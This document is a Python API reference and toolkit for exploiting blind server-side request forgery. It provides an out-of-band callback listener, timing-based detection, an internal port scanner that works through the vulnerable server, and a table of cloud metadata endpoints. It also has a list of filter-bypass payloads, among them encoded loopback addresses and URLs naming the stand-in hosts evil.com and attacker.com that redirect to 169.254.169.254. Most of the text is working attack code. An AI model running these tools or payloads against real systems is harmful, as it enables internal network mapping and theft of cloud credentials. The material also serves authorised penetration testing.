
API Reference: Blind SSRF Exploitation

Libraries Used

Library Purpose
requests Send crafted HTTP requests with SSRF payloads
socket Low-level port scanning and connection testing
http.server Out-of-band callback listener for blind detection
urllib.parse Construct and encode SSRF payload URLs
time Measure response timing for time-based blind SSRF

Installation

pip install requests

Techniques and Payloads

Cloud Metadata Endpoints

Cloud Provider Metadata URL
AWS IMDSv1 http://169.254.169.254/latest/meta-data/
AWS IMDSv2 Same base URL, but every request must carry an `X-aws-ec2-metadata-token` header whose value is first obtained with `PUT http://169.254.169.254/latest/api/token` (with `X-aws-ec2-metadata-token-ttl-seconds`). A GET-only SSRF with no control over method or headers cannot reach it, which is why enforcing IMDSv2 is the standard mitigation.
GCP http://metadata.google.internal/computeMetadata/v1/ (rejected unless the request carries the header `Metadata-Flavor: Google`, so the SSRF must allow custom headers)
Azure http://169.254.169.254/metadata/instance?api-version=2021-02-01 (requires the header `Metadata: true`)
DigitalOcean http://169.254.169.254/metadata/v1/
Oracle Cloud http://169.254.169.254/opc/v2/instance/ (the v2 endpoint requires the header `Authorization: Bearer Oracle`; the older `/opc/v1/` path does not)

Internal Network Scanning Payloads

# Hosts to probe through a blind SSRF: loopback on IPv4 and IPv6, the
# wildcard address, and typical gateway addresses in the RFC 1918 ranges.
# Every entry keeps a literal "{port}" placeholder; expand it with
# str.format(port=...) before use.
_PROBE_HOSTS = (
    "127.0.0.1",
    "localhost",
    "0.0.0.0",
    "[::1]",
    "10.0.0.1",
    "192.168.1.1",
    "172.16.0.1",
)
INTERNAL_TARGETS = [f"http://{host}:{{port}}" for host in _PROBE_HOSTS]

# First-pass ports: SSH, HTTP/HTTPS, MySQL, PostgreSQL, Redis, the two
# common alternate HTTP ports, Elasticsearch and MongoDB.
COMMON_PORTS = [22, 80, 443, 3306, 5432, 6379, 8080, 8443, 9200, 27017]

Core Functions

Out-of-Band (OOB) Blind SSRF Detection

import threading
import time
from http.server import HTTPServer, BaseHTTPRequestHandler

import requests

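class CallbackHandler(BaseHTTPRequestHandler):
    """Minimal listener that records every inbound request as an OOB hit.

    Entries are appended to the class-level ``received`` list so the probing
    code can inspect them after sending payloads.  GET, HEAD and POST are all
    recorded: the target's fetcher will not necessarily use GET, and a hit
    that arrives as a HEAD or POST is just as much a confirmation.
    """

    # Shared across instances on purpose: HTTPServer creates a fresh handler
    # per request, and callers read CallbackHandler.received.
    received: list[dict] = []

    def record(self) -> dict:
        """Append this request to ``received`` and return the new entry.

        The entry holds the request path, headers, client IP, HTTP method
        and a wall-clock timestamp; the timestamp is what lets a hit be
        matched to the probe that was in flight when it arrived.
        """
        entry = {
            "path": self.path,
            "headers": dict(self.headers),
            "client": self.client_address[0],
            "method": self.command,
            "timestamp": time.time(),
        }
        CallbackHandler.received.append(entry)
        return entry

    def respond(self) -> None:
        """Send an empty 200; the explicit Content-Length lets HTTP/1.1
        clients finish the exchange cleanly instead of waiting for EOF."""
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        self.record()
        self.respond()

    def do_HEAD(self):
        self.record()
        self.respond()

    def do_POST(self):
        self.record()
        self.respond()

    def log_message(self, format, *args):
        # Keep the console quiet; hits are collected in ``received`` instead.
        pass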

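def start_callback_server(port: int = 8888, host: str = "0.0.0.0") -> HTTPServer:
    """Start the OOB listener on a daemon thread and return the server.

    Args:
        port: TCP port to listen on.  ``0`` lets the OS pick a free port,
            which is then available as ``server.server_address[1]``.
        host: Interface to bind.  The default binds every interface because
            the *target* must be able to reach this listener; pass
            ``"127.0.0.1"`` when the callback is relayed through a local
            tunnel or proxy so the listener is not exposed more than needed.

    Returns:
        The running ``HTTPServer``.  Call ``shutdown()`` and ``server_close()``
        when finished; the serving thread is a daemon so it never blocks exit.
    """
    server = HTTPServer((host, port), CallbackHandler)
    worker = threading.Thread(target=server.serve_forever, daemon=True)
    worker.start()
    return server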

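def build_oob_payload(callback_url: str, token=None) -> str:
    """Return the URL the target will be asked to fetch.

    A trailing slash on ``callback_url`` is dropped so the path never comes
    out as ``//ssrf-test``.  When ``token`` is given it becomes the final
    path segment, which is what lets a hit in ``CallbackHandler.received``
    be tied back to this specific probe rather than to any probe at all.
    """
    payload = callback_url.rstrip("/") + "/ssrf-test"
    if token:
        payload += "/" + token
    return payload


def test_blind_ssrf_oob(target_url, param_name, callback_url, token=None):
    """Send one OOB probe and return the target's HTTP status code.

    The status code alone does not confirm SSRF -- a blind sink usually
    answers the same way whether or not it fetched anything.  Confirmation
    is a callback arriving at the listener, so inspect
    ``CallbackHandler.received`` afterwards, matching on ``token`` when one
    was supplied (e.g. ``secrets.token_hex(8)``, unique per target/parameter).

    Args:
        target_url: Endpoint under test.
        param_name: Query parameter the target passes to its fetcher.
        callback_url: Base URL of the listener started by
            ``start_callback_server``, as reachable from the target.
        token: Optional per-probe marker embedded in the callback path.

    Returns:
        The HTTP status code of the target's response.
    """
    resp = requests.get(
        target_url,
        params={param_name: build_oob_payload(callback_url, token)},
        timeout=10,
    )
    return resp.status_code


# Not a pytest test despite the name; without this, a collector picks it up
# and errors on the "missing fixtures" target_url/param_name/callback_url.
test_blind_ssrf_oob.__test__ = False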

Time-Based Blind SSRF Detection

import time

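def summarize_ssrf_timing(open_time, closed_time, threshold=2.0):
    """Build the result dict from the two measured durations.

    ``likely_ssrf`` is true when the gap exceeds ``threshold`` seconds in
    either direction.  Which side is slower depends on the target's fetcher
    (a closed port usually RSTs immediately, a filtered one hangs until the
    fetcher's own timeout), so only the magnitude of the gap is compared.
    """
    return {
        "open_port_time": round(open_time, 2),
        "closed_port_time": round(closed_time, 2),
        "likely_ssrf": abs(closed_time - open_time) > threshold,
    }


def time_ssrf_request(target_url, param_name, payload_url, timeout=15):
    """Return how long the target takes to answer when handed ``payload_url``.

    A timeout on our side is not an error here: the target hanging on the
    fetch is exactly the signal being measured, so the elapsed time (about
    ``timeout`` seconds) is returned as-is.
    """
    start = time.perf_counter()
    try:
        requests.get(target_url, params={param_name: payload_url}, timeout=timeout)
    except requests.Timeout:
        pass
    return time.perf_counter() - start


def test_time_based_ssrf(target_url, param_name, open_port_url, closed_port_url,
                         threshold=2.0, samples=1, timeout=15):
    """Detect blind SSRF from the timing gap between two internal targets.

    The target is asked to fetch ``closed_port_url`` and then
    ``open_port_url``, ``samples`` times each and interleaved so that load
    drift on the target affects both equally; the mean durations are then
    compared.  Timing is a weak signal on its own -- a single-sample gap of a
    couple of seconds is easily produced by target-side load -- so treat
    ``likely_ssrf`` as a lead to confirm with an OOB callback where possible.

    Args:
        target_url: Endpoint under test.
        param_name: Query parameter the target passes to its fetcher.
        open_port_url: URL of an internal service believed to be listening.
        closed_port_url: URL of an internal host/port believed to be closed
            or unroutable.
        threshold: Seconds of difference required before ``likely_ssrf`` is set.
        samples: Measurements per URL; more samples smooth out jitter at the
            cost of more requests against the target.
        timeout: Per-request timeout in seconds; a timed-out request counts
            as having taken roughly the full ``timeout``.

    Returns:
        ``{"open_port_time", "closed_port_time", "likely_ssrf"}`` with the
        durations rounded to two decimals.

    Raises:
        ValueError: If ``samples`` is less than 1.
    """
    if samples < 1:
        raise ValueError("samples must be >= 1")
    closed_total = open_total = 0.0
    for _ in range(samples):
        closed_total += time_ssrf_request(target_url, param_name, closed_port_url, timeout)
        open_total += time_ssrf_request(target_url, param_name, open_port_url, timeout)
    return summarize_ssrf_timing(open_total / samples, closed_total / samples, threshold)


# Not a pytest test despite the name; stop collectors from picking it up.
test_time_based_ssrf.__test__ = False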

Internal Port Scanner via SSRF

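def classify_port_response(status_code, elapsed, fast_threshold=3.0, success_statuses=(200,)):
    """Map one probe's outcome to ``"open"`` or ``"closed"``.

    A port is called open only when the target answered with one of
    ``success_statuses`` *and* did so in under ``fast_threshold`` seconds;
    anything else is closed.  Timed-out probes never reach this function.
    """
    if status_code in success_statuses and elapsed < fast_threshold:
        return "open"
    return "closed"


def ssrf_port_scan(target_url, param_name, internal_host, ports,
                   fast_threshold=3.0, success_statuses=(200,), timeout=10):
    """Infer open internal ports from how the target reacts to fetching them.

    Heuristic only: the target's own status code and latency are the only
    signals a blind SSRF gives.  A port is "open" when the response is one of
    ``success_statuses`` and arrived in under ``fast_threshold`` seconds,
    "filtered" when our request timed out, and "closed" otherwise.  Calibrate
    both thresholds against one known-open and one known-closed port first
    (``test_time_based_ssrf`` helps); the 200/3s defaults are a starting
    point, not a property of every SSRF sink.  Each port is one request
    against the target, so large port lists are noisy and may be rate-limited.

    Args:
        target_url: Endpoint under test.
        param_name: Query parameter the target passes to its fetcher.
        internal_host: Host to probe, as seen from the target.  An IPv6
            literal must already be bracketed (``"[::1]"``) because it is
            interpolated verbatim into ``http://{host}:{port}/``.
        ports: Iterable of TCP ports to try; empty input yields empty lists.
        fast_threshold: Upper bound in seconds for an "open" classification.
        success_statuses: Target status codes treated as a successful fetch.
        timeout: Per-request timeout in seconds.

    Returns:
        ``{"open": [...], "closed": [...], "filtered": [...]}`` with ports in
        probe order.
    """
    results = {"open": [], "closed": [], "filtered": []}
    for port in ports:
        ssrf_url = f"http://{internal_host}:{port}/"
        start = time.perf_counter()
        try:
            resp = requests.get(
                target_url,
                params={param_name: ssrf_url},
                timeout=timeout,
            )
        except requests.Timeout:
            results["filtered"].append(port)
            continue
        elapsed = time.perf_counter() - start
        bucket = classify_port_response(resp.status_code, elapsed, fast_threshold, success_statuses)
        results[bucket].append(port)
    return results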

URL Bypass Techniques

# Each payload targets a different gap between the URL validator and the
# library that actually performs the fetch.  Technique -> payload; dict
# insertion order is what BYPASS_PAYLOADS preserves.
_BYPASS_BY_TECHNIQUE = {
    # 127.0.0.1 written as a single 32-bit decimal integer
    "decimal-ip": "http://2130706433/",
    # 127.0.0.1 written as a single hex integer
    "hex-ip": "http://0x7f000001/",
    # leading zero makes the first octet octal (0177 == 127)
    "octal-ip": "http://0177.0.0.1/",
    # IPv4-mapped IPv6 spelling of loopback
    "ipv4-mapped-ipv6": "http://[::ffff:127.0.0.1]/",
    # double-encoded '#' (%2523 -> %23 -> '#'): a validator and a fetcher may
    # disagree on whether the host is 127.0.0.1 or evil.com
    "parser-differential": "http://127.0.0.1%2523@evil.com/",
    # placeholder for an attacker-controlled name whose DNS answer changes
    # between the validator's lookup and the fetcher's (DNS rebinding)
    "dns-rebinding": "http://spoofed.burpcollaborator.net/",
    # placeholder for an attacker host that 30x-redirects to the real target;
    # only useful when the fetcher follows redirects without re-validating
    "open-redirect": "https://attacker.com/redirect?url=http://169.254.169.254/",
}

BYPASS_PAYLOADS = list(_BYPASS_BY_TECHNIQUE.values())

Output Format

{
  "target": "https://app.example.com/fetch",
  "parameter": "url",
  "ssrf_confirmed": true,
  "detection_method": "out-of-band",
  "internal_services_found": [
    {"host": "127.0.0.1", "port": 6379, "service": "Redis"},
    {"host": "10.0.0.5", "port": 3306, "service": "MySQL"}
  ],
  "cloud_metadata_accessible": true,
  "bypasses_needed": ["decimal IP encoding"]
}